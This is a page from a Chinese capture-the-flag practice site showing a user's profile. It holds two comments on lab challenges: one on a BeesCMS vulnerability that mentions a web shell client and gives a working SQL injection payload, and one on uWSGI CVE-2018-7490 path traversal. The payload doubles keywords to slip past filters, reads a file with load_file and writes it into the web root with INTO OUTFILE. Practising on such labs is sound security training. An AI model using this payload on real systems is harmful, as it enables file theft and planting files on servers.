首页
在线靶场
搜索
登录
注册
酒吞
1360
能力值
30
靶场
完成靶场
评论信息
评论信息
BeesCMS系统漏洞分析溯源
使用了菜刀连接上,文件打不开 ,(不知道是我的菜刀问题,还是环境问题)那就换一个思路 使用load_file 函数来读取到 key.txt 文件,直接访问 写出来的文件即可。 admin’un union ion seselectlect 1,load_file('/key.txt'),3,4,5 in into outoutfilefile ‘/var/www/html/a.txt’#
2020-01-20 11:55:11
赞 ( 7 )
uWSGI 漏洞复现(CVE-2018-7490)
使用对url进行编码绕过,uWSGI这个是一个web中间件程序 我还是不明白 如何找到key.txt 在robot.txt没有提示
2020-01-06 15:07:34
赞 ( 1 )
返回顶部
常见问题
商务合作
关注微博
关注微信